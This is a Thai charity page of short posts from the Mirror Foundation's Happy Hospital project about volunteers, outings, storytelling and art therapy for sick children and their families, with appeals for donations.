ทะเลเชื่อมความสุขสู่ “ผู้ป่วยเด็ก”

เด็กป่วยทางกาย อย่างน้อย
เรายังรู้ว่าเขาเจ็บป่วยตรงไหน
.
เด็กป่วยทางจิตใจ เด็กอธิบายไม่ได้
กว่าเราจะมองเห็นความผิดปกตินั้น
เขาต้องเผชิญความป่วยลำพัง
ต่อสู้กับความคิดของตัวเอง
.
ทำไมทุกคนรำคาญ โดนดุมากกว่าเพื่อน
ไม่เป็นที่ยอมรับของเพื่อน คุณครู
หรือแม้แต่ของพ่อแม่ตัวเอง
.
ตัวอย่างเด็กเหล่านี้ คือเด็กกลุ่มสมาธิสั้น
เด็ก LD ที่มีพัฒนาการทางสมองช้า
.
เด็กกลุ่มนี้จำเป็นต้องได้รับการดูแล
ประคับประคอง อดทน และเข้าใจ
.
โครงการโรงพยาบาลมีสุข
กำลังทำงานสร้างสุข ให้กับเด็กกลุ่มนี้
.
วันพรุ่งนี้เราจะพาเด็กป่วย 10 ครอบครัว
คัดเด็กที่อาการป่วยไม่เป็นอุปสรรคต่อการเที่ยว
พาไปเล่นน้ำทะเลด้วยกัน
โดยมีเจ้าหน้าที่โรงพยาบาลไปด้วย
.
ให้ทะเลเชื่อมความสุขให้กับเด็กและครอบครัว
ให้กิจกรรมนี้ บอกเด็กๆ ทางอ้อมว่า
เขามีคุณค่า สมควรได้รับการดูแล
แล้วเราจะประคับประคองกันไป
.
สนับสนุนกิจกรรมพาเด็กป่วยเที่ยวทะเล
ได้ที่บัญชีโครงการโรงพยาบาลมีสุข
เลขที่ 202-258286-0 ธ.ไทยพาณิชย์

Share Button

ระยะทาง 600 บาท ระหว่างผู้ป่วยตัวน้อยกับสุขภาพที่ดี

น้องกระต่ายอายุเพียง 3 ขวบ
แต่ใช้เวลามาแล้ว 1 ปี
ในการเดินทางมารักษาตัว
ด้วยโรคเรื้อรังที่โรงพยาบาล
.
น้องกระต่ายอาเจียนไม่ทราบสาเหตุ
วันละหลายรอบ
จนร่างกายไม่ตอบรับอาหาร
.
หมอตรวจร่างกาย ส่งตรวจชิ้นเนื้อ
ตรวจสารเคมีในสมอง
แต่ยังหาวิธีรักษาให้หายขาดไม่ได้
ทำได้ดีที่สุดคือรักษาตามอาการ
น้องจึงต้องมาโรงพยาบาลต่อเนื่อง
.
แม้การรักษาพยาบาล
จะใช้สิทธิบัตรทองไม่เสียเงิน
แต่ทุกครั้งที่มาโรงพยาบาล
แม่ ซึ่งเป็นลูกจ้างบริษัทเอกชน
ต้องหาเงินครั้งละ 600 บาท
เป็นค่าแท็กซี่พาน้องกระต่ายมาหาหมอ
.
โครงการโรงพยาบาลมีสุข มูลนิธิกระจกเงา
จึงสนับสนุนค่าเดินทางให้ครอบครัวนี้
และเรามีแผนสนับสนุนค่าเดินทาง
ให้ครอบครัวเด็กป่วยอีกจำนวน 10 ครอบครัว
.
เพราะค่าเดินทางที่สูง
เกินกว่ากำลังครอบครัวจะแบกรับ
มักเป็นสาเหตุต้นๆ
ที่ทำให้เด็กป่วยหลายคนตัดขาดจากการรักษา
.
ร่วมสนับสนุน ค่าเดินทางเพื่อเด็กป่วย
ได้ที่ บัญชีโครงการโรงพยาบาลมีสุข
เลขที่ 2022582860 ธ.ไทยพาณิชย์
.
หรือ สนับสนุนผ่านเว็บไซด์เทใจดอทคอม
https://taejai.com/th/d/seeadoctor/
(บริจาคผ่านเทใจสามารถลดหย่อนภาษีได้)

Share Button

ในห้องเล็ก ๆ กล่องของขวัญเพื่อเด็กป่วยถูกห่อด้วยมือของอาสาสมัครผู้พิการ

มุมเล็กๆ บนเตียงคนไข้ในโรงพยาบาล
มีชีวิตน้อยๆ ของเด็กป่วยเรื้อรังต้องพักรักษาตัว
ไม่มีโอกาสเที่ยวเล่นในเทศกาลแห่งความสุข
ที่กำลังจะมาถึง
.
แต่ถึงอย่างไร เด็กป่วยก็ยังเป็นเด็ก
ในยามที่ต้องฉีดยา เจาะสายน้ำเกลือ
การได้รับของขวัญสักชิ้น ตุ๊กตาสักตัว
จะเป็นความสุขเล็กน้อย
ที่ทำให้อุ่นใจมากขึ้นหลายเท่า
.
อีกมุมเล็กๆ ในห้องอาสาสมัคร มูลนิธิกระจกเงา
จึงมีกลุ่มผู้พิการ มาเป็นอาสาสมัคร
ช่วยกันห่อของขวัญ เตรียมส่งไปเซอร์ไพรส์
เป็นกำลังใจให้เด็กๆ ถึงโรงพยาบาล
.
อาสาสมัครเหล่านี้ส่วนหนึ่งพิการทางสมอง
เข้าออกโรงพยาบาลมาตั้งแต่เกิด
ส่วนหนึ่งพิการทางการเคลื่อนไหว
ต้องไปรับยา ติดตามอาการตลอดชีวิต
.
พวกเขาเคยผ่านการเจ็บป่วย
และยินดีสละเวลาช่วงวันหยุด
มาช่วยเติมเต็มความสุข
ให้กับเด็กๆ ที่กำลังเผชิญกับความป่วยเช่นเดียวกัน
เพราะพวกเขาเข้าใจดีกว่า การได้รับความสุข
ในช่วงเวลาที่กำลังเจ็บป่วยนั้น สำคัญเช่นไร
___________________________________
ขอบคุณทั้งหัวใจและแรงกาย
จากกลุ่มอาสาสมัครผู้พิการจาก สสส.
ที่เป็นส่วนหนึ่ง ทำให้เทศกาลแห่งความสุข
ของน้องๆ เกิดขึ้นได้จริง
.
ของขวัญทั้งหมด
โรงพยาบาลมีสุข จะเป็นตัวแทนนำส่งให้เด็กป่วย
ในกิจกรรมของขวัญปีใหม่ ส่งใจให้เด็กป่วย ปีที่16
ไปยังโรงพยาบาลเครือข่ายและศูนย์การศึกษาพิเศษฯ
เพื่อให้ทั้งเด็กป่วย และผู้ปกครอง ได้รับรู้ว่า
ยังมีผู้ใหญ่ใจดีในสังคมอีกมากมาย
พร้อมช่วยเหลือ และส่งความปรารถดีให้เสมอ
.
ร่วมเป็นส่วนหนึ่งในการส่งของขวัญ
บริจาคตุ๊กตา ของเล่น ขนม ฯลฯ
เพื่อมอบให้เด็กในเทศกาลปีใหม่และวันเด็ก
ได้ที่ มูลนิธิกระจกเงา เลขที่ 191
ซอย วิภาวดีรังสิต 62 แยก 4-7
แขวงตลาดบางเขน เขต หลักสี่ กทม. 10210
โทร.061-909-1840, 063-931-6340
.
หรือบริจาคทุนทรัพย์ได้ผ่านทางเทใจดอทคอม
(การบริจาคสามารถนำไปลดหย่อนภาษีได้)
บริจาคผ่านโครงการโรงพยาบาลมีสุข
เลขที่บัญชี 2022582860 ธ.ไทยพาณิชย์
Share Button

ผู้เห็นความตาย ทั้งต่อหน้าและลับหลัง


ผู้เห็นความตาย ทั้งต่อหน้าและลับหลัง

บ่อยครั้งที่ได้รับรู้ว่าเด็กป่วยที่เคยเล่นสนุกด้วยกัน เสียชีวิตแบบกระทันหันในชั่วโมงถัดไป
เมื่อแรก ความเศร้าจู่โจมจนคิดถึงการทำงานต่อแทบไม่ไหว.. เพราะเจ้าหน้าที่ทุกคนก็มีหัวใจ
การทำงานกับเด็กป่วยในโรงพยาบาลจำเป็นต้องใช้ความเข้มแข็งในการทำความเข้าใจ
กับการอยู่และการจากไปของคนที่เรารู้จัก คุ้นเคย เหมือนเพื่อนในชีวิต..

ในพื้นที่การทำงานของโครงการโรงพยาบาลมีสุข ..ไม่ได้จำกัดอยู่แค่เพียงเรื่องราวภายในของเด็กป่วย
ที่หวังเพียงเพื่อบรรเทาและลดความทุกข์อันเกิดจากความเจ็บปวดทรมานจากโรคภัยและการรักษาเท่านั้น
การรับฟังปัญหาความหนักอกทุกข์ใจของพ่อแม่ หรือผู้ดูแลเด็กป่วยคืออีกภารกิจที่สำคัญของโครงการ

การลดความทุกข์ นา นา ลงได้จะช่วยเพิ่มความสุขให้เกิดขึ้นได้จริง
ตลอดการทำงานที่ผ่านมากว่าสิบปีของโครงการฯ เจ้าหน้าที่และอาสาสมัครรู้ดีว่า พวกเขาต้องพบเจอกับสิ่งใดบ้าง
ในทุกการต่อสู้..สุดท้ายปลายทางของเด็กป่วยคือการจบชีวิตลงอย่างสงบ ด้วยโรคร้ายเกินต้านทาน
แต่หากอาการทุเลาเบาบาง..จะมีโอกาสได้กลับบ้าน ไปโรงเรียน เล่น และใช้ชีวิตเฉกเช่นเด็กธรรมดา

ทุกครั้งของการจากลา มีน้ำตาเสมอ .. การทำความเข้าใจในสัจธรรมช่วยทำให้คนทำงานแข็งแกร่งขึ้น
เราไม่อยากให้ความรู้สึกโศกเศร้ามาบั่นทอน หรือลดชั่วโมงเพิ่มความสุขให้กับเด็กป่วยทุกคน
ถึงแม้ว่ามนุษย์ทุกคนต้องหมุนวนในวัฏจักรแห่งการเกิด แก่ เจ็บและตาย เป็นเรื่องธรรมดา
แต่การเกิดมาพร้อมกับโรค ทำให้เด็กป่วยบางคนไม่มีโอกาสได้เติบโต
เพื่อแก่เฒ่าไปตามวัยและตายเมื่อถึงเวลาอันสมควร

ไม่ใช่แค่เพียงเจ้าหน้าที่ แต่อาสาสมัครของโครงการต้องเปิดพื้นที่ของชีวิต
เพื่อเรียนรู้เรื่องราวภายในของตนเองหลังความตายที่ดูง่ายดายของเด็กๆที่รู้จักมักคุ้นทุกๆคน

ภายในห้องเล็กๆที่บรรจุเสียงหัวเราะเอาไว้ ท่ามกลางสายน้ำเกลือระโยงระยาง
หากทำเป็นมองไม่เห็นเข็มฉีดยาที่ข้อมือข้างขวาของเด็กป่วย..
ไม่ว่าอย่างไร เขาก็คือเด็กที่ควรได้รับสิทธิมีชีวิต หัวเราะ ยิ้ม เช่นเด็กทั่วไป
ถึงแม้ว่าจะเติบโตอยู่บนเตียง และมีชีวิตวนๆเวียนๆอยู่กับหมอ พยาบาล และยา

Share Button

ในจักรวาลของเด็กป่วย..

 

ในจักรวาลของเด็กป่วย..
สายมากแล้ว .. เด็กสาวในวัยสิบสี่ปีเต็มไม่ตื่นลืมตาเหมือนกับทุกเช้า..
เธอเสียชีวิตหลังจากฉลองวันเกิดได้เพียงวันเดียว
เมื่อวานพี่ๆเจ้าหน้าที่โครงการโรงพยาบาลมีสุข เพิ่งนำเค้กก้อนน้อยๆมามอบให้ถึงเตียง เรายังยิ้มหัวเราะให้กัน
พวกพี่ๆเลือกสรร ขนมที่หวานน้อยที่สุด แต่อร่อยที่สุด
อย่างน้อยก็อร่อยกว่าอาหารที่ต้องกินเป็นประจำในโรงพยาบาล
รอยยิ้มยังไม่ทันจางหาย ความทรงจำกว่าห้าปีที่เคยเล่นสนุกด้วยกัน ยังหมุนวนท่ามกลางความเศร้าระคนสุข

บางทีการจากไปของเธอ..คงทำให้เด็กสาวรู้สึกสบายทั้งกายและใจ
การมีชีวิตโดยมีโรคภัยไข้เจ็บเป็นเพื่อนสนิทไม่เคยทำให้คนเรายิ้มได้อย่างเต็มที่สักครั้ง
โรคมะเร็งต่อมน้ำเหลือง ทำลายความฝันทั้งหมดในชีวิตของเด็กที่ป่วยไข้
ต่อให้มีเรี่ยวแรงแค่ไหน ก็ไม่อาจต่อสู้กับไวรัสตัวเล็กๆที่แพร่กระจายไปทั่วสรรพางค์กายได้

การมีชีวิตอยู่ จึงทำได้แค่เพียงประคับประคองลมหายใจเข้าออกเพื่อใครสักคนหนึ่ง พ่อ แม่ พี่น้อง ปู่ ย่า ตายาย
การตายก็เช่นกัน เด็กป่วยทุกคนจากไปด้วยหัวใจเข้มแข็ง เธอรู้ดีกว่าต้องมีวันหนึ่งวันใด อันใกล้นี้
ที่จะไม่ได้ตื่นลืมตามาพบเจอกับทุกคนอีก อย่างดีที่สุด เธอทำได้เพียงปฏิบัติตัวตามหมอสั่ง
กินยา ฉีดยา นอนพัก กินข้าว คีโม และพยายามทำจิตใจให้ร่าเริงเพื่อเตือนให้ร่างกายหายดี..สักที

ในจักรวาลของเด็กป่วย ประกอบด้วยความสุขนับเป็นเปอร์เซ็นก็แทบติดลบ
ยารสขม หลากสี ไม่เคยทำให้วันไหนนึกสนุกหัวใจพองโต
เข็มฉีดยาตัวร้าย เฝ้าแต่ทิ่มแทงเส้นเลือดเล็กๆบางๆ มันฝังรากของความเจ็บปวดไว้ลึกไม่เคยลืม
การต้องนอนพัก ทั้งๆที่สมองยังอยากทำอะไรต่อมิอะไรอีกมากมาย
ในห้องสันทนาการวันนี้พี่ๆอาสามาเล่นด้วย แต่การฤทธิ์คีโมมันปั่นป่วนจนชวนให้หมดแรง
ข้าวทุกเม็ด น้ำแกงจืดซืด นา นาอาหารในถาดหลุม .. มันไร้รสชาติหวาน เปรี้ยว เค็ม เผ็ด

หากดวงอาทิตย์ขึ้น และแสงแดดแอบส่องมาถึงเตียงบ้าง
วันที่เคยซึมเซาก็เหมือนกระปรี้กระเปร่าขึ้น
วันไหนที่ไปไม่ถึงห้องเล่น.. หากโชคดี พี่ๆอาสาเดินมาหาถึงเตียง
วันนั้น ความเจ็บปวดทั้งกายและใจ ลดน้อยลงอย่างน่าอัศจรรย์

เมื่อร่างกายน้อยๆของเด็กตัวเล็กๆ กำลังต่อสู้กับโรคภัยไข้เจ็บ
หากความเจ็บป่วย มีตัวตน เพื่อนเล่น คือศัตรูตัวร้าย .. ที่ทำลายโรคได้ ..แม้เพียงชั่วขณะ
ท่ามกลางจักรวาลของความป่วยไข้.. มีเพียงมนุษย์เท่านั้น ที่จะเข้าใจความรู้สึกทุกข์สุขของกันและกัน

Share Button

นิทานข้างเตียง

S__159989861

“เมื่อเสียงนิทานจากข้างเตียงดังขึ้น เสียงของความสุข รอยยิ้ม และเสียงหัวเราะของเด็ก ๆ ก็ดังขึ้นด้วยเช่นกัน”

เราเข้ามาในวันที่น้องลั้ลลา ต้องเข้าไปทำ MRI ในช่วงเย็น จึงถูกสั่งให้งดอาหารมาตั้งแต่ 7 โมงเช้า ทำให้วันนี้ดูอ่อนเพลียกว่าทุกวัน แม้ว่าน้องจะค่อนข้างกังวลกับการรอเข้าไปทำ MRI แต่ก็ยังตั้งใจฟังนิทานที่เราเล่า และตั้งใจทำหุ่นกระดาษจากตัวละครในนิทานที่เราเล่าให้ฟังอย่างเต็มที่

“กระดุ๊กกระดิ๊ก กระด๊อกกระแด๊ก” เสียงดิ้นของตั๊กแตน ที่มาของชื่อนิทานที่เรานำมาเล่าให้น้องฟัง เป็นเรื่องราวของยายเช้าที่ชอบหาวปากกว้าง จนตั๊กแตนบินเข้าปาก ยายเช้าจึงกินสัตว์ตัวอื่นเพื่อให้ตั๊กแตนหายไปแต่ก็ไม่เป็นผล

นอกจากนิทานเรื่องนี้จะสอนเรื่องสุขอนามัยให้กับเด็ก ๆ อย่างการหาวควรต้องปิดปากแล้ว อีกนัยหนึ่งยังสอนให้เรารู้จักการแก้ปัญหาอย่างถูกต้อง ควรแก้ปัญหาที่ต้นเหตุไม่ใช่ที่ปลายเหตุ และความเป็นเหตุเป็นผลที่เด็ก ๆ จะสามารถนำมาปรับใช้กับชีวิตประจำวันได้ด้วย

หลังจากนิทานจบลง แต่รอยยิ้ม และความสุขที่เรามอบให้ผ่านนิทานยังคงอยู่ ในโลกแห่งความจริง เราไม่มีพลังวิเศษใด ๆ อย่างในนิทาน แต่เราเชื่อว่าความทุกข์ ความเศร้า ความกังวลที่น้องกำลังเผชิญ สิ่งเหล่านั้นเราจะสามารถรักษาได้ด้วยกำลังใจ เราเพียงแต่หวังว่าวันหนึ่งน้องจะได้นอนฟังนิทานในห้องนอนไม่ใช่นิทานจากข้างเตียงพยาบาลเหมือนอย่างเคย

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

อาสา

36539156_1959585587424784_8743712210951340032_o

“เรามาทำอาสาเพื่อส่งต่อสิ่งดีๆให้กับผู้อื่น เราไม่จำเป็นต้องไปสร้างสิ่งยิ่งใหญ่ แค่เข้าไปสร้างความสุขในใจ และทำด้วยใจที่อยากให้ก็เพียงพอแล้ว แม้แบ่งเบาความทุกข์ในใจไม่ได้ทั้งหมด แต่ก็ภูมิใจที่อย่างน้อยก็ได้ช่วยเหลือ”

เด็กหลายคนที่ป่วย เขาก็ยังมีช่วงเวลาที่มีความสุข มีเสียงหัวเราะ มีสังคม เหมือนกับเด็กทั่วไป
เพียงแต่พื้นที่เหล่านั้นถูกจำกัดให้แคบลง แต่สำหรับเด็กป่วยติดเตียงแล้ว นอกจากความสุขที่ถูกจำกัดให้น้อยลงกว่าเดิมปฏิสัมพันธ์ต่อคนรอบข้างก็ยังถูกจำกัดตามลงไปด้วย

น้องฮุสเซน ก็เป็นเด็กป่วยติดเตียงอีกคนหนึ่งที่ขาดปฏิสัมพันธ์กับคนรอบข้าง น้องมักไม่ค่อยพูดจากับใคร และใช้เวลาส่วนใหญ่ไปกับโทรศัพท์ อาสาจึงเข้าไปพูดคุย ทำกิจกรรมร่วมกับน้องเพื่อให้น้องได้มีสังคม และได้ทำกิจกรรมอื่นๆ ที่นอกเหนือจากการจ้องแค่หน้าจอโทรศัพท์เพียงอย่างเดียว

ด้วยอาการป่วยของน้อง ทำให้ขาน้องไม่มีแรง เวลาห้อยขาลงจากเตียง น้องดูเจ็บมาก สิ่งที่ทำได้คือ ดึงหนังตัวเอง และใช้มือที่ดูอ่อนแรงนั้นช่วยพยุงขาของตัวเองขึ้นเท่านั้นการเลือกกิจกรรม จึงจำเป็นต้องอาศัยความสะดวกของน้องเป็นหลัก

เกมเศรษฐี และเกมบิงโก จึงเป็นสิ่งที่น้องเสนอ และเลือกที่จะเล่น ซึ่งพี่ๆอาสาก็เห็นว่าเป็นเกมที่สามารถจะช่วยพัฒนาความรู้ในเรื่องของการนับเลข และการจดจำของน้องให้ดีมากยิ่งขึ้น เนื่องจากน้องเข้ามารับการรักษาที่โรงพยาบาลตั้งแต่เด็กๆ ทำให้น้องไม่ได้เข้าโรงเรียน การเรียนรู้บางส่วนจึงขาดไป หลังจากทำกิจกกรมเราเห็นได้ชัดว่าน้องมีปฏิสัมพันธ์กับคนรอบข้างมากยิ่งขึ้น และยังสังเกตุเห็นว่าน้องสามารถนับเลขได้เร็วขึ้น สามารถใช้ตามองแล้วคิดในใจได้ โดยไม่ต้องใช้นิ้วนับแล้ว

“พี่จะมาอีกเมื่อไหร่ ผมอยากให้พี่มาอีก” เป็นคำถามสุดท้ายที่น้องฮุสเซนถามขึ้นก่อนอาสาจะกลับ

หลายอาทิตย์ที่ผ่านมา แค่ได้เห็นรอยยิ้มของเด็กๆ มันก็มีความสุขในใจมากแล้ว แต่สำหรับครั้งนี้
ยิ่งมีความสุขมากขึ้นไปอีก ทำให้เราเข้าใจ และเห็นอะไรหลายๆอย่างในชีวิตมากขึ้น

“ไม่ใช่แค่เราให้น้อง แต่น้องก็ให้เราเหมือนกัน”

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

ศิลปะการจัดวาง

“ป้าไม่เคยทำหรอกงานศิลปะพวกนี้ เคยทำแต่งานก่อสร้าง”

ผู้ป่วยคนหนึ่งกล่าว ขณะที่ตาเพ่งมองดอกไม้ประดิษฐ์จากไหมพรมหลากสีที่บรรจงทำขึ้นด้วยตัวเองทุกชิ้นอย่างตั้งใจ คุณป้าเสียบดอกไม้เหล่านั้นลงกระถางด้วยรอยยิ้มน้อยๆ ก่อนจะจัดวางไว้ที่หัวเตียงอย่างดี

งานศิลปะเหล่านี้จะช่วยให้พวกเขาได้แสดงออกถึงความคิด ความรู้สึกและประสบการณ์ผ่านทางงานศิลปะ รวมทั้งเป็นการสื่อถึงสิ่งที่อยู่ภายในจิตใจออกมาภายนอกโดยไม่ต้องใช้คําพูด

ผู้ป่วยหลายคนมีสภาวะที่ไม่สามารถบอกเล่าความรู้สึกนึกคิดออกมาเป็นคำพูดได้ หรือมีปัญหาเรื่องความสัมพันธ์กับผู้อื่น โดยเฉพาะผู้ใหญ่ หรือผู้สูงอายุบางคนอาจใช้เหตุผลในการดำเนินชีวิตมาตลอด จึงมีความรู้สึกเครียด และกดดันไม่น้อย

37021315_1977424718974204_431662501218746368_n

โครงการโรงพยาบาลมีสุขได้มีโอกาสเข้าไปทำกิจกรรมศิลปะบำบัดกับผู้ป่วยในหลายๆโรงพยาบาล
เป้าหมายของเราไม่ใช่ทำให้โรคมะเร็งหายไป หากแต่เป็นการช่วยเหลือให้คลี่คลายจากความทุกข์ ความกังวล

“บางคนอาจมองว่า ศิลปะคือการระบายออกทางอารมณ์ แต่แท้จริงแล้ว ศิลปะยังคืนความสวยงามกลับสู่ข้างในจิตใจเราด้วย”

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

การเดินทางของความสุขในโลกใต้ท้องทะเลลึก

“เด็กทุกคนควรได้เล่นและเรียนรู้” วัยเด็กคือ วัยที่ควรได้รับโอกาสในการเรียนรู้เพื่อพัฒนาทักษะให้เหมาะสมกับช่วงอายุ แต่บางครั้งการเรียนรู้ก็ได้ถูกจำกัดด้วยปัจจัยหลายๆ อย่าง ไม่ว่าจะเป็น การเจ็บป่วย ปัญหาทางเศรษฐกิจในครอบครัว เป็นต้น โดยเฉพาะเด็กป่วยเวลาแห่งการเรียนรู้ของเขาจึงมีเงื่อนไข เมื่อเด็กคนหนึ่งเจ็บป่วยทำให้เศรษฐกิจในครัวเรือนเริ่มมีปัญหา การใช้เงินจึงต้องมีความระมัดระวัง เพื่อที่จะเก็บไว้เป็นค่ารักษาที่บางครั้งอาจกินเวลายาวนาน

แน่นอนว่าเมื่อเข้าสู่กระบวนการรักษาย่อมทำให้เกิดสภาวะความเครียด ความกดดันทั้งเด็กป่วยและพ่อแม่ผู้ปกครอง การใช้ชีวิตระหว่างการรักษาจึงมีบ้านกับโรงพยาบาลเท่านั้นที่แวะเวียนไปอย่างต่อเนื่อง โรงเรียน สนามเด็กเล่น ที่ที่เด็กควรอยู่เพื่อการเรียนรู้ พบปะสังสรรค์ พัฒนาด้านร่างกายและจิตใจนั้นจึงถูกลดบทบาทลงมามุ่งในการรักษาเป็นหลัก

ดังนั้นกิจกรรมพาเด็กป่วยและครอบครัวเที่ยวชม Bangkok Sealife Ocean World ที่เด็ก ๆ จะได้พบกับสัตว์น้ำใต้ทะเลมากกว่า 6,000 ตัวเสมือนการท่องอยู่ใต้ทะเลลึก เป็นกิจกรรมที่จะช่วยบำบัดความทุกข์และเติมความสุขให้มีพลัง กำลังใจ ในการใช้ชีวิต พี่เจ้าหน้าที่โรงพยาบาลได้กล่าวว่า

“ การพาเด็กไปทำกิจกรรมนอกสถานที่ เป็นการรักษาจิตใจเด็ก ความเจ็บป่วยทางกายก็มีผลกระทบต่อสภาพจิตใจของคนเราเหมือนกัน เวลาเราป่วย เราก็รู้ว่ามันไม่มีความสุข เด็ก ๆ ก็เช่นกัน แต่พอได้รับความสุขทางจิตใจ มันก็เหมือนยาเยียวยาจิตใจ สภาพร่างกายที่มันอ่อนแอมันก็ดีขึ้น”

“ถึงแม้ว่าเขาจะเป็นเด็กป่วย แต่ตัวเองก็ยังมีความสุขได้ เราจึงอยากเป็นส่วนหนึ่งในการที่จะช่วยให้เด็ก ๆ ได้มีความสุขในแต่ละวันที่เค้ายังมีชีวิต อยากเป็นส่วนหนึ่งที่ทำให้เด็กมีกำลังใจ โดยการมอบความสุขให้กับเด็กๆ”

IMG-9426

การมาเที่ยว Bangkok sealife ocean world เหมือนเป็นความฝันอีกอย่างหนึ่งที่เด็กหลาย ๆ คน เคยวาดฝันและจินตนาการเอาไว้ ภาพบรรยากาศแห่งความสุขได้ถูกบรรจุและรวบรวมไว้ในความทรงจำที่ดีของเด็กป่วย ตามคำบอกเล่าจากผู้ปกครองว่า “ดีใจ และตื่นเต้นมาก ๆ ครั้งนี้เป็นครั้งแรกในชีวิตเค้าที่ได้มีโอกาสมาเที่ยวในสถานที่ดี ๆ แบบนี้ เด็ก ๆ เค้ามีความสุขมาก ดีใจที่น้องเค้าได้มาเห็นของจริง จากเมื่อก่อนได้ดูแค่ในทีวี”

IMG-9424

“ป่วยแต่ก็สามารถมีความสุขได้” ความสุขของเด็กป่วย ไม่ได้ถูกจำกัดอยู่ที่สภาพร่างกาย เด็กป่วยยังคงมีความเป็นเด็ก ต้องการที่จะเรียนรู้ และสนใจในสิ่งต่าง ๆ รอบตัว การที่ได้ออกไปเที่ยวกับครอบครัวเป็นการเพิ่มความทรงจำที่ดีอย่างหนึ่ง เพราะเวลา ณ ขณะนั้น เป็นการหยุดความเจ็บปวดทางร่างกายไว้ และใช้ชีวิตเหมือนเด็กปกติทั่วไป เสียงหัวเราะและรอยยิ้มที่เกิดขึ้นระหว่างคนในครอบครัว จึงเป็นสัญญาณที่ย้ำเตือนว่า “ถึงกายป่วย ถ้าใจยังเข้มแข็ง เราก็สามารถมีความสุขได้”

IMG-9428

เรื่องโดย : นางสาวภัทราภรณ์ พุ่มพวงเกียรติ
มหาวิทยาลัยมหาสารคาม

Share Button

หมอฟัน(อาสา)มีสุข

28309893_10155909969657110_940364433_o

ทันทีที่โครงการโรงพยาบาลมีสุข เปิดรับสมัคร “อาสามีสุข” เพื่อเป็นอาสาสมัครประจำโรงพยาบาล กำหนดให้อาสาทำกิจกรรมลดทุกข์ สร้างสุขให้เด็กป่วยอย่างน้อยสัปดาห์ละหนึ่งวัน ต่อเนื่องนาน 2 เดือน ทันตแพทย์หญิงสุพัฒตรา โต๊ะชูดี ทันตแพทย์ประจำโรงพยาบาลธนบุรี 2 หรือที่เด็กๆ ชอบเรียกกันว่า “พี่อ๊อด” ก็ลงชื่อสมัครเข้าร่วมโครงการทันที โดยเป็นอาสามีสุขประจำโรงพยาบาลราชวิถี และใช้เวลาทุกวันพุธ ซึ่งตรงกับวันหยุดของเธอในการทำกิจกรรมร่วมกับเด็กป่วย

แม้เวลาจะเป็นสิ่งที่มีค่ายิ่ง ต่ออาชีพหมอฟันของเธอ ที่วันทั้งวันหมดไปกับการรักษาฟันของผู้คนจำนวนมาก และทั้งที่ชีวิตปกติของตนเองก็ต้องทำงานในโรงพยาบาลอยู่แล้ว แต่เธอเล่าแรงบันดาลใจที่ทำให้ยอมสละเวลาหนึ่งวันสำหรับทำงานอาสาสมัครดูแลเด็กป่วยว่า ครั้งหนึ่งมีเด็กป่วยมาเป็นคนไข้ของเธอ ระหว่างทำฟันได้มีโอกาสให้กำลังใจทั้งตัวเด็กและญาติ ทำให้รู้สึกว่าตนเองเหมือนเป็นจุดเชื่อมต่อการเป็นกำลังใจของทั้งสองฝ่าย ดังนั้นเมื่อโครงการนี้เปิดรับเธอจึงสนใจ

“เด็กป่วยบางคน อายุแค่ 5-6 ขวบ ก็ต้องเข้ารับการผ่าตัดแล้ว เราเจอพ่อแม่เขา เรารู้สึกว่า เขาก็ต้องสู้นะ ส่วนเราก็เป็นจุดเล็กๆ ที่พอจะช่วยได้ ในทำนองนี้ โอเค เราอาจจะทำแค่ฟันเด็ก แต่หน้าที่ตรงนั้นมันไม่ได้มานั่งเล่นกับเด็กแบบนี้ เราเห็นเด็กยิ้ม มีความสุขขึ้น ถึงเป็นระยะเวลาสั้นๆ ก็ยังดี” เสียงบอกเล่าพร้อมกับรอยยิ้มของทันตแพทย์หัวใจอาสา…

เธอว่าการเป็นอาสาดูแลเด็กป่วย ทำให้พบกับความสุขดีที่ได้ทำ ไม่เพียงเฉพาะกับเด็ก แต่กับพ่อแม่เด็กป่วย การได้คุย ได้ให้กำลังใจ แม้ไม่มาก แต่แค่ได้เห็นรอยยิ้ม ก็ทำให้เธอรู้สึกว่าการสละเวลาวันหยุดมาเป็นอาสานั้นช่างคุ้มค่า  “เห็นเขายิ้มได้ในช่วงเวลาที่เค้ายังต้องแบกภาระของลูกที่ป่วยอย่างนี้ เราว่ามันก็คุ้มที่จะทำ”

เธอยอมรับว่าช่วงแรกของการเข้ามาทำงานอาสามีสุขต้องบังคับตนเองให้มาลองทำดู แอบคิดในใจว่าจะเหนื่อยหรือเปล่า เพราะเราทำงานมาทั้งสัปดาห์ หยุดเฉพาะวันพุธ แต่พอได้ลองมาแล้วกลับรู้สึกว่าไม่ได้บังคับตัวเองให้มา เราอยู่ตรงนี้ เรามีความสุข ถึงระหว่างทางจะมีปัญหาเรื่องงาน หรือเรื่องอะไรก็ตาม ก็เตรียมใจไว้แล้วว่า จะต้องปรับตัว เพราะเราตั้งใจจะเป็นอาสาสมัครแล้ว ต่อให้ไม่มีงานตรงหน้า ก็ต้องทำตัวให้เป็นประโยชน์มากที่สุด สุดท้ายกลายเป็นว่าการเป็นอาสาสมัคร ทำให้เราเป็นมืออาชีพมากขึ้นในการทำงาน” นั่นคือการเปลี่ยนแปลงที่เกิดขึ้นหลังจากได้มาทำงานจิตอาสา

เธอเล่าว่า “รอยยิ้ม” คือความประทับใจที่ได้จากการเป็นอาสาสมัคร “มีทั้งตอนได้ถ่ายรูปน้องที่ป่วย น้องนั่งหงอยๆ ซึมๆ พอเรามาเล่นด้วยน้องก็ดูสดชื่นขึ้น หรือตอนที่ได้มีโอกาสไปร่วมงานวันเด็กที่โรงพยาบาลรามาธิบดี เด็กในวอร์ด มีสายน้ำเกลือห้อยโยงเต็มแขน ก็ลงมาดูกิจกรรม แต่ด้วยสภาพร่างกายไม่เอื้ออำนวยจึงได้แค่ยืนดู พี่อาสาสมัครจึงจับมือเด็กเต้น เขาดูดีใจมาก ดูตื่นเต้น คิดว่าเด็กคงรู้สึกว่า ตัวเองป่วยอยู่เล่นสนุกแบบนั้นไม่ได้ แต่การทำกิจกรรม ทำให้เด็กก็มีโอกาสได้ทำ ความสุขจึงส่งผ่านออกมาทางสีหน้าของเขา ความประทับใจที่เราเห็นมากที่สุดก็คือ รอยยิ้มเด็กป่วย”

